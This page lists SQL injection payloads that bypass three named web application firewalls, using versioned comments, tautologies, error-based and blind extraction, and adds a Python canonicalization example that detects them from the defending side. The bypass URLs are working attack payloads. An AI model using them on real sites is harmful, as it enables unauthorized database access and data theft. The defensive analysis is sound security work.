Summary of WAF Bypass Techniques
Yunsuo (云锁)
Blocked
http://www.test123.com/article.php?id=1%20union%20select%201,2,3
Bypass
http://www.test123.com/article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()
360websec
Blocked
http://www.xxx.com.cn/productshow.php?id=79'
Bypass
http://www.xxx.com.cn/productshow.php?id=79%20||%201=1
WTSWAF
Blocked
http://www.xxx.com.cn/productshow.php?id=-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)
Bypass
http://www.xxx.com.cn/productshow.php?id=-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)
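
Seen from the defending side, the Yunsuo and WTSWAF entries above show why a filter has to canonicalize a parameter before matching it: the MySQL versioned comment, the mixed case and the %a0 byte all disappear once the value is reduced to what the database parser sees. The following is an added example, not code from the original page or from any WAF product; the function names and the short token list are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, unquote_to_bytes

# Hypothetical token list for this illustration; a production rule set is far larger.
SQL_TOKENS = ("union", "select", "updatexml", "substr", "ascii", "database", "user")

# MySQL executes the body of /*! ... */ comments (optionally prefixed by a version number).
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Parameter values copied from the `id=` part of the URLs listed on this page.
SAMPLES = {
    "yunsuo_blocked": "1%20union%20select%201,2,3",
    "yunsuo_bypass": "-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()",
    "wtswaf_blocked": "-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)",
    "wtswaf_bypass": "-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)",
}


def naive_hit(raw_value: str) -> bool:
    """Signature applied to the URL-decoded text only, with no canonicalization."""
    return bool(re.search(r"union\s+select", unquote(raw_value), re.I))


def canonicalize(raw_value: str) -> str:
    """Reduce a raw, still URL-encoded value to a form close to what MySQL parses."""
    text = unquote_to_bytes(raw_value).decode("latin-1")  # keeps %a0 as the byte 0xA0
    text = VERSIONED_COMMENT.sub(r" \1 ", text)            # unwrap executable comments
    text = PLAIN_COMMENT.sub(" ", text)                    # ordinary comments act as spaces
    text = text.replace("\xa0", " ")                       # assumption: 0xA0 treated as whitespace
    return re.sub(r"\s+", " ", text).strip().lower()


def sql_tokens(raw_value: str) -> list:
    """Return the SQL tokens visible after canonicalization, in SQL_TOKENS order."""
    canon = canonicalize(raw_value)
    return [t for t in SQL_TOKENS if re.search(rf"\b{t}\b", canon)]


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:15} naive={naive_hit(value)!s:5} tokens={sql_tokens(value)}")
```

Canonicalization closes the comment and whitespace gaps, but the 360websec entry (`|| 1=1`) contains no keyword at all, so token matching cannot replace parameterized queries in the affected scripts.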